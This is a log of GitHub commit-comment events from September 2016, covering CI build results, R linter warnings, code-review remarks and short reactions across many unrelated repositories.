{"id":"4575739434","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19058650,"position":null,"line":null,"path":null,"commit_id":"36be4f81212e065634b10e7c835b5c16c019cc6b","created_at":"2016-09-16T18:50:35Z","updated_at":"2016-09-16T18:50:35Z","body":"#2520943-WindowsCalc-Engine_Integration (vidanovic) - x86_64-MacOS-10.9-clang: Build Failed\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-36be4f81212e065634b10e7c835b5c16c019cc6b-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-36be4f81212e065634b10e7c835b5c16c019cc6b-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-51.18%25-red.svg)</a> \n"}},"created_at":"2016-09-16T18:50:35Z"}
{"id":"4575739833","type":"CommitCommentEvent","actor":{"login":"sn0w"},"repo":{"name":"sn0w/shiro"},"payload":{"comment":{"id":19058651,"position":null,"line":null,"path":null,"commit_id":"cc6653f16e1121489dd7ac1a7f9b24ac67b948dd","created_at":"2016-09-16T18:50:40Z","updated_at":"2016-09-16T18:50:40Z","body":"Proof:\r\n![](http://i.imgur.com/uWKueQf.png)"}},"created_at":"2016-09-16T18:50:40Z"}
{"id":"4575748132","type":"CommitCommentEvent","actor":{"login":"Shawak"},"repo":{"name":"sn0w/shiro"},"payload":{"comment":{"id":19058676,"position":null,"line":null,"path":null,"commit_id":"cc6653f16e1121489dd7ac1a7f9b24ac67b948dd","created_at":"2016-09-16T18:52:22Z","updated_at":"2016-09-16T18:52:22Z","body":":+1: "}},"created_at":"2016-09-16T18:52:22Z"}
{"id":"4575748522","type":"CommitCommentEvent","actor":{"login":"nunigaia"},"repo":{"name":"nunigaia/mediaplayer2"},"payload":{"comment":{"id":19058678,"position":null,"line":null,"path":null,"commit_id":"552c5716a06e3d247b17612b1aedb78fd4c5515d","created_at":"2016-09-16T18:52:27Z","updated_at":"2016-09-16T18:52:27Z","body":"Add Portuguese language Pt-Pt translation to MediaPlayer2"}},"created_at":"2016-09-16T18:52:27Z"}
{"id":"4575761704","type":"CommitCommentEvent","actor":{"login":"Simn"},"repo":{"name":"HaxeFoundation/haxe"},"payload":{"comment":{"id":19058709,"position":null,"line":null,"path":null,"commit_id":"f0aeb9bcfc9701c18f56058863d8c0ada919f037","created_at":"2016-09-16T18:55:08Z","updated_at":"2016-09-16T18:55:08Z","body":"This change causes segfaults on our CI which I can reproduce locally with compile-macro.hxml among other things. Please check!"}},"created_at":"2016-09-16T18:55:08Z"}
{"id":"4575762520","type":"CommitCommentEvent","actor":{"login":"noloader"},"repo":{"name":"weidai11/cryptopp"},"payload":{"comment":{"id":19058710,"position":null,"line":null,"path":null,"commit_id":"91ca6c117de7ce68526e96f4f75e4813c69577dc","created_at":"2016-09-16T18:55:17Z","updated_at":"2016-09-16T18:55:17Z","body":"Also see [Cut-over to CRYPTOPP_ASSERT due to CVE-2016-7420](https://github.com/weidai11/cryptopp/issues/277) and [CVE-2016-7420 and dev-brach 'trap' ready for testing](http://groups.google.com/forum/#!topic/cryptopp-users/FIT5LktFaNY) on the user mailing list."}},"created_at":"2016-09-16T18:55:17Z"}
{"id":"4575763604","type":"CommitCommentEvent","actor":{"login":"pdshaw"},"repo":{"name":"VoltDB/voltdb"},"payload":{"comment":{"id":19058713,"position":5,"line":4,"path":"tests/test_apps/customimporter/exampleformatter/build.xml","commit_id":"8087bfa7c4f1f65dc82dfcc9ebfaece648cbf25a","created_at":"2016-09-16T18:55:29Z","updated_at":"2016-09-16T18:55:29Z","body":"customimporter is gone. That was the sample collection Dan created, checked in erroneously."}},"created_at":"2016-09-16T18:55:29Z"}
{"id":"4575766272","type":"CommitCommentEvent","actor":{"login":"annulen"},"repo":{"name":"Vitallium/conan-libxml2-qt"},"payload":{"comment":{"id":19058718,"position":8,"line":8,"path":"conanfile.py","commit_id":"241518fa9785c72a4e8ef7cd0dc275f650b0c762","created_at":"2016-09-16T18:56:02Z","updated_at":"2016-09-16T18:56:02Z","body":"Url is not correct"}},"created_at":"2016-09-16T18:56:02Z"}
{"id":"4575766679","type":"CommitCommentEvent","actor":{"login":"groxxda"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":19058720,"position":null,"line":null,"path":null,"commit_id":"0201869418906c7cc8e2643bf876feb3ba27f4ab","created_at":"2016-09-16T18:56:08Z","updated_at":"2016-09-16T18:56:08Z","body":"Lgtm"}},"created_at":"2016-09-16T18:56:08Z"}
{"id":"4575772172","type":"CommitCommentEvent","actor":{"login":"liberty-developer"},"repo":{"name":"liberty-developer/inputstream.mpd"},"payload":{"comment":{"id":19058733,"position":null,"line":null,"path":null,"commit_id":"1e2ffe3ae7e66b2990feec6c8ba37f927eb692ce","created_at":"2016-09-16T18:57:12Z","updated_at":"2016-09-16T18:57:12Z","body":"Yep, I'll try to get in contact with amazon developers.\r\nBeside this there may be a fast widevine with h/w decoding out in the near future, it would be possible to pass kodi the decoded frames, but there has to be some work to be done with kodi renderers.\r\n\r\nI'll play around with this things, maybe I can find a backdoor - but the chance is minimal."}},"created_at":"2016-09-16T18:57:12Z"}
{"id":"4575775356","type":"CommitCommentEvent","actor":{"login":"LucDemortier"},"repo":{"name":"ramohse/dsp"},"payload":{"comment":{"id":19058746,"position":null,"line":null,"path":null,"commit_id":"a28f8f6dd1d78336f265fd9eb6b67421e5eef94c","created_at":"2016-09-16T18:57:50Z","updated_at":"2016-09-16T18:57:50Z","body":"RE: 06-linear_algebra.md\r\ncc: @lucdemortier @reshamametis @aramnath @gfsoileau @julialintern @galvin-mj\r\n\r\nHello @ramohse \r\n\r\nGood work on the linear algebra!\r\n- Note for the matrix operation question 3.2, one is asked to compute A-C.T, not A+C.T\r\n- For the optional question 3.8, you can calculate the fourth power of B as `B**4`. This is different from what you calculated, `B^4`, which is a bitwise XOR of each element of B with the number 4.\r\n\r\n👍 "}},"created_at":"2016-09-16T18:57:50Z"}
{"id":"4575775967","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"AtomLinter/linter-lintr"},"payload":{"comment":{"id":19058747,"position":null,"line":null,"path":null,"commit_id":"dc281b5fd2bbeb40b6b48da5fbffc8c9d9d75215","created_at":"2016-09-16T18:57:57Z","updated_at":"2016-09-16T18:57:57Z","body":"[/var/folders/gw/_2jq29095y7b__wtby9dg_5h0000gn/T/atom-linter_27664N2du8iuA0Yi/bad.R:1:5:](https://github.com/AtomLinter/linter-lintr/blob/dc281b5fd2bbeb40b6b48da5fbffc8c9d9d75215//var/folders/gw/_2jq29095y7b__wtby9dg_5h0000gn/T/atom-linter_27664N2du8iuA0Yi/bad.R#L1) *style:* **Use <-, not =, for assignment.**\n```r\n​fun = function(one)\n    ^\n```\n[/var/folders/gw/_2jq29095y7b__wtby9dg_5h0000gn/T/atom-linter_27664N2du8iuA0Yi/bad.R:2:1:](https://github.com/AtomLinter/linter-lintr/blob/dc281b5fd2bbeb40b6b48da5fbffc8c9d9d75215//var/folders/gw/_2jq29095y7b__wtby9dg_5h0000gn/T/atom-linter_27664N2du8iuA0Yi/bad.R#L2) *style:* **Opening curly braces should never go on their own line and should always be followed by a new line.**\n```r\n​{\n^\n```\n[/var/folders/gw/_2jq29095y7b__wtby9dg_5h0000gn/T/atom-linter_27664N2du8iuA0Yi/bad.R:3:3:](https://github.com/AtomLinter/linter-lintr/blob/dc281b5fd2bbeb40b6b48da5fbffc8c9d9d75215//var/folders/gw/_2jq29095y7b__wtby9dg_5h0000gn/T/atom-linter_27664N2du8iuA0Yi/bad.R#L3) *style:* **Words within variable and function names should be separated by '_' rather than '.'.**\n```r\n​  one.plus.one <- oen + 1\n  ^~~~~~~~~~~~\n```\n[/var/folders/gw/_2jq29095y7b__wtby9dg_5h0000gn/T/atom-linter_27664N2du8iuA0Yi/bad.R:3:3:](https://github.com/AtomLinter/linter-lintr/blob/dc281b5fd2bbeb40b6b48da5fbffc8c9d9d75215//var/folders/gw/_2jq29095y7b__wtby9dg_5h0000gn/T/atom-linter_27664N2du8iuA0Yi/bad.R#L3) *warning:* **local variable ‘one.plus.one’ assigned but may not be used**\n```r\n​  one.plus.one <- oen + 1\n  ^~~~~~~~~~~~\n```\n[/var/folders/gw/_2jq29095y7b__wtby9dg_5h0000gn/T/atom-linter_27664N2du8iuA0Yi/bad.R:3:19:](https://github.com/AtomLinter/linter-lintr/blob/dc281b5fd2bbeb40b6b48da5fbffc8c9d9d75215//var/folders/gw/_2jq29095y7b__wtby9dg_5h0000gn/T/atom-linter_27664N2du8iuA0Yi/bad.R#L3) *warning:* **no visible binding for global variable ‘oen’, Did you mean 'one'?**\n```r\n​  one.plus.one <- oen + 1\n                  ^~~\n```\n[/var/folders/gw/_2jq29095y7b__wtby9dg_5h0000gn/T/atom-linter_27664N2du8iuA0Yi/bad.R:4:11:](https://github.com/AtomLinter/linter-lintr/blob/dc281b5fd2bbeb40b6b48da5fbffc8c9d9d75215//var/folders/gw/_2jq29095y7b__wtby9dg_5h0000gn/T/atom-linter_27664N2du8iuA0Yi/bad.R#L4) *style:* **Variable and function names should be all lowercase.**\n```r\n​  four <- newVar <- matrix(1:10,nrow = 2)\n          ^~~~~~\n```\n[/var/folders/gw/_2jq29095y7b__wtby9dg_5h0000gn/T/atom-linter_27664N2du8iuA0Yi/bad.R:4:11:](https://github.com/AtomLinter/linter-lintr/blob/dc281b5fd2bbeb40b6b48da5fbffc8c9d9d75215//var/folders/gw/_2jq29095y7b__wtby9dg_5h0000gn/T/atom-linter_27664N2du8iuA0Yi/bad.R#L4) *warning:* **local variable ‘newVar’ assigned but may not be used**\n```r\n​  four <- newVar <- matrix(1:10,nrow = 2)\n          ^~~~~~\n```\n[/var/folders/gw/_2jq29095y7b__wtby9dg_5h0000gn/T/atom-linter_27664N2du8iuA0Yi/bad.R:4:33:](https://github.com/AtomLinter/linter-lintr/blob/dc281b5fd2bbeb40b6b48da5fbffc8c9d9d75215//var/folders/gw/_2jq29095y7b__wtby9dg_5h0000gn/T/atom-linter_27664N2du8iuA0Yi/bad.R#L4) *style:* **Commas should always have a space after.**\n```r\n​  four <- newVar <- matrix(1:10,nrow = 2)\n                                ^\n```\n[/var/folders/gw/_2jq29095y7b__wtby9dg_5h0000gn/T/atom-linter_27664N2du8iuA0Yi/bad.R:5:7:](https://github.com/AtomLinter/linter-lintr/blob/dc281b5fd2bbeb40b6b48da5fbffc8c9d9d75215//var/folders/gw/_2jq29095y7b__wtby9dg_5h0000gn/T/atom-linter_27664N2du8iuA0Yi/bad.R#L5) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​  four[ 1, ]\n      ^\n```\n[/var/folders/gw/_2jq29095y7b__wtby9dg_5h0000gn/T/atom-linter_27664N2du8iuA0Yi/bad.R:6:10:](https://github.com/AtomLinter/linter-lintr/blob/dc281b5fd2bbeb40b6b48da5fbffc8c9d9d75215//var/folders/gw/_2jq29095y7b__wtby9dg_5h0000gn/T/atom-linter_27664N2du8iuA0Yi/bad.R#L6) *style:* **Only use double-quotes.**\n```r\n​  txt <- 'hi'\n         ^~~~\n```\n[/var/folders/gw/_2jq29095y7b__wtby9dg_5h0000gn/T/atom-linter_27664N2du8iuA0Yi/bad.R:7:3:](https://github.com/AtomLinter/linter-lintr/blob/dc281b5fd2bbeb40b6b48da5fbffc8c9d9d75215//var/folders/gw/_2jq29095y7b__wtby9dg_5h0000gn/T/atom-linter_27664N2du8iuA0Yi/bad.R#L7) *warning:* **local variable ‘three’ assigned but may not be used**\n```r\n​  three <- two+ 1\n  ^~~~~\n```\n[/var/folders/gw/_2jq29095y7b__wtby9dg_5h0000gn/T/atom-linter_27664N2du8iuA0Yi/bad.R:7:12:](https://github.com/AtomLinter/linter-lintr/blob/dc281b5fd2bbeb40b6b48da5fbffc8c9d9d75215//var/folders/gw/_2jq29095y7b__wtby9dg_5h0000gn/T/atom-linter_27664N2du8iuA0Yi/bad.R#L7) *warning:* **no visible binding for global variable ‘two’, Did you mean 'txt'?**\n```r\n​  three <- two+ 1\n           ^~~\n```\n[/var/folders/gw/_2jq29095y7b__wtby9dg_5h0000gn/T/atom-linter_27664N2du8iuA0Yi/bad.R:7:15:](https://github.com/AtomLinter/linter-lintr/blob/dc281b5fd2bbeb40b6b48da5fbffc8c9d9d75215//var/folders/gw/_2jq29095y7b__wtby9dg_5h0000gn/T/atom-linter_27664N2du8iuA0Yi/bad.R#L7) *style:* **Put spaces around all infix operators.**\n```r\n​  three <- two+ 1\n             ~^\n```\n[/var/folders/gw/_2jq29095y7b__wtby9dg_5h0000gn/T/atom-linter_27664N2du8iuA0Yi/bad.R:8:5:](https://github.com/AtomLinter/linter-lintr/blob/dc281b5fd2bbeb40b6b48da5fbffc8c9d9d75215//var/folders/gw/_2jq29095y7b__wtby9dg_5h0000gn/T/atom-linter_27664N2du8iuA0Yi/bad.R#L8) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  if(txt == 'hi') 4\n    ^\n```\n[/var/folders/gw/_2jq29095y7b__wtby9dg_5h0000gn/T/atom-linter_27664N2du8iuA0Yi/bad.R:8:13:](https://github.com/AtomLinter/linter-lintr/blob/dc281b5fd2bbeb40b6b48da5fbffc8c9d9d75215//var/folders/gw/_2jq29095y7b__wtby9dg_5h0000gn/T/atom-linter_27664N2du8iuA0Yi/bad.R#L8) *style:* **Only use double-quotes.**\n```r\n​  if(txt == 'hi') 4\n            ^~~~\n```\n[/var/folders/gw/_2jq29095y7b__wtby9dg_5h0000gn/T/atom-linter_27664N2du8iuA0Yi/bad.R:9:4:](https://github.com/AtomLinter/linter-lintr/blob/dc281b5fd2bbeb40b6b48da5fbffc8c9d9d75215//var/folders/gw/_2jq29095y7b__wtby9dg_5h0000gn/T/atom-linter_27664N2du8iuA0Yi/bad.R#L9) *style:* **Closing curly-braces should always be on their own line, unless it's followed by an else.**\n```r\n​  5}  \n   ^\n```\n[/var/folders/gw/_2jq29095y7b__wtby9dg_5h0000gn/T/atom-linter_27664N2du8iuA0Yi/bad.R:9:5:](https://github.com/AtomLinter/linter-lintr/blob/dc281b5fd2bbeb40b6b48da5fbffc8c9d9d75215//var/folders/gw/_2jq29095y7b__wtby9dg_5h0000gn/T/atom-linter_27664N2du8iuA0Yi/bad.R#L9) *style:* **Trailing whitespace is superfluous.**\n```r\n​  5}  \n    ^~\n```\n[/var/folders/gw/_2jq29095y7b__wtby9dg_5h0000gn/T/atom-linter_27664N2du8iuA0Yi/bad.R:11:0:](https://github.com/AtomLinter/linter-lintr/blob/dc281b5fd2bbeb40b6b48da5fbffc8c9d9d75215//var/folders/gw/_2jq29095y7b__wtby9dg_5h0000gn/T/atom-linter_27664N2du8iuA0Yi/bad.R#L11) *error:* **unexpected end of input**\n```r\n​\n\n```\n[/var/folders/gw/_2jq29095y7b__wtby9dg_5h0000gn/T/atom-linter_27664N2du8iuA0Yi/bad.R:11:1:](https://github.com/AtomLinter/linter-lintr/blob/dc281b5fd2bbeb40b6b48da5fbffc8c9d9d75215//var/folders/gw/_2jq29095y7b__wtby9dg_5h0000gn/T/atom-linter_27664N2du8iuA0Yi/bad.R#L11) *style:* **Trailing blank lines are superfluous.**\n```r\n​\n^\n```"}},"created_at":"2016-09-16T18:57:57Z"}
{"id":"4575778520","type":"CommitCommentEvent","actor":{"login":"benaadams"},"repo":{"name":"davidfowl/Channels"},"payload":{"comment":{"id":19058750,"position":5,"line":3,"path":"src/Channels.Text.Primitives/WriteableChannelFormatter.cs","commit_id":"45d04e26ec3e15385962602ee8aab0295b94d020","created_at":"2016-09-16T18:58:27Z","updated_at":"2016-09-16T18:58:27Z","body":"Linq wut."}},"created_at":"2016-09-16T18:58:27Z"}
{"id":"4575781155","type":"CommitCommentEvent","actor":{"login":"ahmelsayed"},"repo":{"name":"projectkudu/kudu"},"payload":{"comment":{"id":19058756,"position":null,"line":null,"path":null,"commit_id":"bb91360f292b2b85f2aef78052ad4d5277b4ef1a","created_at":"2016-09-16T18:58:58Z","updated_at":"2016-09-16T18:58:58Z","body":"@watashiSHUN make sure to configure your git name and email on all your machines. This shows up as `From: shucai <shucai@WATASHISHUN>`"}},"created_at":"2016-09-16T18:58:58Z"}
{"id":"4575787525","type":"CommitCommentEvent","actor":{"login":"latobarita"},"repo":{"name":"stellar/stellar-core"},"payload":{"comment":{"id":19058776,"position":null,"line":null,"path":null,"commit_id":"268c4a6e60e5186bbc1c9d895c124f69d779805e","created_at":"2016-09-16T19:00:18Z","updated_at":"2016-09-16T19:00:18Z","body":"all tests pass:\nsuccess: https://travis-ci.org/stellar/stellar-core/builds/160522804\n"}},"created_at":"2016-09-16T19:00:18Z"}
{"id":"4575794011","type":"CommitCommentEvent","actor":{"login":"aszlig"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":19058793,"position":null,"line":null,"path":null,"commit_id":"d1b34967fea22f535c1a009f3af290c347455e8a","created_at":"2016-09-16T19:01:33Z","updated_at":"2016-09-16T19:01:33Z","body":"What about using `testsuite/\\*` instead?"}},"created_at":"2016-09-16T19:01:33Z"}
{"id":"4575799637","type":"CommitCommentEvent","actor":{"login":"austinkelleher"},"repo":{"name":"CharlesWall/node-cluster-balancer"},"payload":{"comment":{"id":19058809,"position":null,"line":null,"path":null,"commit_id":"ac815099cd18983c065195cf0564c2be1b48657f","created_at":"2016-09-16T19:02:42Z","updated_at":"2016-09-16T19:02:42Z","body":"Unless I'm missing something, it looks like you're still calling `url.parse` on line 25 even if it's not provided. `url.parse` can't take `undefined`, so this will throw an error."}},"created_at":"2016-09-16T19:02:42Z"}
{"id":"4575799756","type":"CommitCommentEvent","actor":{"login":"bbondy"},"repo":{"name":"brave/browser-laptop"},"payload":{"comment":{"id":19058811,"position":null,"line":null,"path":null,"commit_id":"ad3878b69acd9043d941ceee6bd826c35c5eb96d","created_at":"2016-09-16T19:02:44Z","updated_at":"2016-09-16T19:02:44Z","body":"++"}},"created_at":"2016-09-16T19:02:44Z"}
{"id":"4575805378","type":"CommitCommentEvent","actor":{"login":"MishaTheMiner"},"repo":{"name":"MishaTheMiner/MasterMindsConsole"},"payload":{"comment":{"id":19058823,"position":null,"line":null,"path":null,"commit_id":"272387012ea310e6bf6e5f177c1328d828c0dc4d","created_at":"2016-09-16T19:03:45Z","updated_at":"2016-09-16T19:03:45Z","body":"Closes #1 "}},"created_at":"2016-09-16T19:03:45Z"}
{"id":"4575806375","type":"CommitCommentEvent","actor":{"login":"amici-ursi"},"repo":{"name":"creesch/reddit-moderator-toolbox"},"payload":{"comment":{"id":19058828,"position":null,"line":null,"path":null,"commit_id":"f75a3b94d48ed7579b674f61036fbbc60600b8fb","created_at":"2016-09-16T19:03:57Z","updated_at":"2016-09-16T19:03:57Z","body":"rip"}},"created_at":"2016-09-16T19:03:57Z"}
{"id":"4575811517","type":"CommitCommentEvent","actor":{"login":"amici-ursi"},"repo":{"name":"creesch/reddit-moderator-toolbox"},"payload":{"comment":{"id":19058842,"position":null,"line":null,"path":null,"commit_id":"f75a3b94d48ed7579b674f61036fbbc60600b8fb","created_at":"2016-09-16T19:05:00Z","updated_at":"2016-09-16T19:05:00Z","body":":sob: "}},"created_at":"2016-09-16T19:05:00Z"}
{"id":"4575812115","type":"CommitCommentEvent","actor":{"login":"latobarita"},"repo":{"name":"stellar/stellar-core"},"payload":{"comment":{"id":19058847,"position":null,"line":null,"path":null,"commit_id":"268c4a6e60e5186bbc1c9d895c124f69d779805e","created_at":"2016-09-16T19:05:09Z","updated_at":"2016-09-16T19:05:09Z","body":"fast-forwarding master to auto = 21af1648"}},"created_at":"2016-09-16T19:05:09Z"}
{"id":"4575812588","type":"CommitCommentEvent","actor":{"login":"rtbo"},"repo":{"name":"vector-of-bool/vscode-cmake-tools"},"payload":{"comment":{"id":19058850,"position":null,"line":null,"path":null,"commit_id":"2c165defb326e91900074c13ba35a05847f2d741","created_at":"2016-09-16T19:05:17Z","updated_at":"2016-09-16T19:05:17Z","body":"@vector-of-bool this merge is 99% about changing from LF to CRLF line endings.\r\nSorry about this. I messed my editor configuration and did not see I was commiting with CRLF (which is weird as I'm editing on linux).\r\nI fixed it from 860e4fef7ae4f46cd0bb099dcd6c8e467a8aa97f."}},"created_at":"2016-09-16T19:05:17Z"}
{"id":"4575817830","type":"CommitCommentEvent","actor":{"login":"cbalantic"},"repo":{"name":"cbalantic/dissertationSandbox"},"payload":{"comment":{"id":19058865,"position":null,"line":null,"path":null,"commit_id":"ed32ae9e26a007dc544e957e621faec445ef3d09","created_at":"2016-09-16T19:06:19Z","updated_at":"2016-09-16T19:06:19Z","body":"Added required library to function"}},"created_at":"2016-09-16T19:06:19Z"}
{"id":"4575822222","type":"CommitCommentEvent","actor":{"login":"ofalvai"},"repo":{"name":"ofalvai/temalabor-sails"},"payload":{"comment":{"id":19058874,"position":null,"line":null,"path":null,"commit_id":"657495f39db5fb9b6666fd1a6d0470e95819f731","created_at":"2016-09-16T19:07:17Z","updated_at":"2016-09-16T19:07:17Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;cfPhLffX&#x2F;11-angular-pelda-ajax-hivasok\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Angular példa AJAX hívások</a>"}},"created_at":"2016-09-16T19:07:17Z"}
{"id":"4575823463","type":"CommitCommentEvent","actor":{"login":"ernst67"},"repo":{"name":"jemproject/JEM-Project"},"payload":{"comment":{"id":19058877,"position":null,"line":null,"path":null,"commit_id":"e8813722207da34bdaa3cfd2925d4376f34c568d","created_at":"2016-09-16T19:07:33Z","updated_at":"2016-09-16T19:07:33Z","body":"My suggestion was 'additional' actually.\r\nBut 'advanced' sounds better to me than 'enhanced'."}},"created_at":"2016-09-16T19:07:33Z"}
{"id":"4575824594","type":"CommitCommentEvent","actor":{"login":"ofalvai"},"repo":{"name":"ofalvai/temalabor-sails"},"payload":{"comment":{"id":19058880,"position":null,"line":null,"path":null,"commit_id":"21dc28e2042a970959dc09d803cce35304348fc2","created_at":"2016-09-16T19:07:48Z","updated_at":"2016-09-16T19:07:48Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;cfPhLffX&#x2F;11-angular-pelda-ajax-hivasok\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Angular példa AJAX hívások</a>"}},"created_at":"2016-09-16T19:07:48Z"}
{"id":"4575825073","type":"CommitCommentEvent","actor":{"login":"Gillou68310"},"repo":{"name":"mupen64plus-ae/mupen64plus-ae"},"payload":{"comment":{"id":19058881,"position":null,"line":null,"path":null,"commit_id":"bbdc3c5e8eaaeb1dd7b29c809b6ab1aeabb1d3a1","created_at":"2016-09-16T19:07:53Z","updated_at":"2016-09-16T19:07:53Z","body":"I think addresses should be 0x8061963C and 0x8061963E\r\nThe max address with expansion pack (8MB) is 0x80800000"}},"created_at":"2016-09-16T19:07:53Z"}
{"id":"4575831936","type":"CommitCommentEvent","actor":{"login":"snicolet"},"repo":{"name":"VoyagerOne/Stockfish"},"payload":{"comment":{"id":19058899,"position":null,"line":null,"path":null,"commit_id":"9fea57e5d57740447f018d27ead8d3230746574d","created_at":"2016-09-16T19:09:27Z","updated_at":"2016-09-16T19:09:27Z","body":"Hmm, how can it have any effect on move ordering, in fact? Aren't all the captures on the same square?"}},"created_at":"2016-09-16T19:09:27Z"}
{"id":"4575839025","type":"CommitCommentEvent","actor":{"login":"miohtama"},"repo":{"name":"s4w3d0ff/python-poloniex"},"payload":{"comment":{"id":19058911,"position":null,"line":null,"path":null,"commit_id":"dfcdcae40819f34f3f10cf1b719921ffe8eb1fc6","created_at":"2016-09-16T19:11:02Z","updated_at":"2016-09-16T19:11:02Z","body":"Also you don't need to clone and run setup.py - this is two steps.  `pip` does Github and pypi so you can do in one step:\r\n\r\n     pip install poloniex\r\n\r\nOr \r\n\r\n    pip install -e \"git+git@github.com:s4w3d0ff/python-poloniex.git#egg=poloniex\""}},"created_at":"2016-09-16T19:11:02Z"}
{"id":"4575844587","type":"CommitCommentEvent","actor":{"login":"pupa1591591978"},"repo":{"name":"benbalter/gman"},"payload":{"comment":{"id":19058922,"position":4,"line":4,"path":"README.md","commit_id":"bd1bc8beb8ead2e2d456f22c9a9cdbc6cbe81f1d","created_at":"2016-09-16T19:12:14Z","updated_at":"2016-09-16T19:12:14Z","body":"Как восстановить drm данные на андроид устройстве"}},"created_at":"2016-09-16T19:12:14Z"}
{"id":"4575845840","type":"CommitCommentEvent","actor":{"login":"chelseakomlo"},"repo":{"name":"twstrike/otrv4"},"payload":{"comment":{"id":19058930,"position":27,"line":55,"path":"otrv4.md","commit_id":"681601240eea147f72000007742039268565ff16","created_at":"2016-09-16T19:12:29Z","updated_at":"2016-09-16T19:12:29Z","body":"I'm not sure we need to write out all of the scenarios... we can just list the common properties, and then specify what is different for interactive/non-interactive? "}},"created_at":"2016-09-16T19:12:29Z"}
{"id":"4575846845","type":"CommitCommentEvent","actor":{"login":"bhariharan"},"repo":{"name":"forcedotcom/SalesforceMobileSDK-iOS"},"payload":{"comment":{"id":19058931,"position":7,"line":7,"path":"libs/SalesforceHybridSDK/SalesforceHybridSDKTestApp/SalesforceHybridSDKTestApp.entitlements","commit_id":"d05791682188b35e270cc389ee14abf051d69df3","created_at":"2016-09-16T19:12:42Z","updated_at":"2016-09-16T19:12:42Z","body":"Shouldn't this be `com.salesforce.mobilesdk.SalesforceHybridSDKTestApp` like the others?"}},"created_at":"2016-09-16T19:12:42Z"}
{"id":"4575847061","type":"CommitCommentEvent","actor":{"login":"RenaKunisaki"},"repo":{"name":"mupen64plus-ae/mupen64plus-ae"},"payload":{"comment":{"id":19058934,"position":null,"line":null,"path":null,"commit_id":"bbdc3c5e8eaaeb1dd7b29c809b6ab1aeabb1d3a1","created_at":"2016-09-16T19:12:45Z","updated_at":"2016-09-16T19:12:45Z","body":"It's GameShark cheats. The first byte is code type. 81 = 16bit write."}},"created_at":"2016-09-16T19:12:45Z"}
{"id":"4575855787","type":"CommitCommentEvent","actor":{"login":"saurabhRTR"},"repo":{"name":"sanealytics/recommenderlabrats"},"payload":{"comment":{"id":19058959,"position":null,"line":null,"path":null,"commit_id":"75b26446f3c8366aae43c698d8e036482cea6544","created_at":"2016-09-16T19:14:39Z","updated_at":"2016-09-16T19:14:39Z","body":"Link to stackoverflow -\r\nhttp://stackoverflow.com/questions/38519372/cannot-call-spsolve/38519979#38519979\r\n\r\nWaiting for RcppArmadillo to update sp_solve"}},"created_at":"2016-09-16T19:14:39Z"}
{"id":"4575856676","type":"CommitCommentEvent","actor":{"login":"zacharyacutey"},"repo":{"name":"JoinRajuncraftNow/CSE"},"payload":{"comment":{"id":19058962,"position":7,"line":9,"path":"index.html","commit_id":"aa4d28263c904937daf6d239377d556704d44f0a","created_at":"2016-09-16T19:14:51Z","updated_at":"2016-09-16T19:14:51Z","body":"RIGHT HERE, FIX THIS INDENTATION."}},"created_at":"2016-09-16T19:14:51Z"}
{"id":"4575859443","type":"CommitCommentEvent","actor":{"login":"LethalGhost"},"repo":{"name":"animusdev/blue"},"payload":{"comment":{"id":19058970,"position":null,"line":null,"path":null,"commit_id":"a21e971a628eb407221627c00a51b2b19a3007c3","created_at":"2016-09-16T19:15:27Z","updated_at":"2016-09-16T19:15:27Z","body":"Частичный #652 "}},"created_at":"2016-09-16T19:15:27Z"}
{"id":"4575860065","type":"CommitCommentEvent","actor":{"login":"LethalGhost"},"repo":{"name":"animusdev/blue"},"payload":{"comment":{"id":19058972,"position":null,"line":null,"path":null,"commit_id":"8ce3957745f758b3fcd30fc5d3d65700ca6b4d10","created_at":"2016-09-16T19:15:36Z","updated_at":"2016-09-16T19:15:36Z","body":"Fix #652 "}},"created_at":"2016-09-16T19:15:36Z"}
{"id":"4575861422","type":"CommitCommentEvent","actor":{"login":"BenLubar"},"repo":{"name":"NodeBB/nodebb-plugin-composer-default"},"payload":{"comment":{"id":19058980,"position":4,"line":357,"path":"static/less/composer.less","commit_id":"12668aeaab7fbd0bd92327dbc7212e3cc8d932b7","created_at":"2016-09-16T19:15:54Z","updated_at":"2016-09-16T19:15:54Z","body":"whyyyyyyyyyyyy"}},"created_at":"2016-09-16T19:15:54Z"}
{"id":"4575862456","type":"CommitCommentEvent","actor":{"login":"boomzillawtf"},"repo":{"name":"NodeBB/nodebb-plugin-composer-default"},"payload":{"comment":{"id":19058981,"position":4,"line":357,"path":"static/less/composer.less","commit_id":"12668aeaab7fbd0bd92327dbc7212e3cc8d932b7","created_at":"2016-09-16T19:16:09Z","updated_at":"2016-09-16T19:16:09Z","body":"Yikes! Now there's *always* a scroll bar in the composer."}},"created_at":"2016-09-16T19:16:09Z"}
{"id":"4575862475","type":"CommitCommentEvent","actor":{"login":"sujith857"},"repo":{"name":"sujith857/imad-2016-app"},"payload":{"comment":{"id":19058982,"position":null,"line":null,"path":null,"commit_id":"148c949d61e0e04581697c16a787442a69898dbb","created_at":"2016-09-16T19:16:09Z","updated_at":"2016-09-16T19:16:09Z","body":"<h1>hii</h1>"}},"created_at":"2016-09-16T19:16:09Z"}
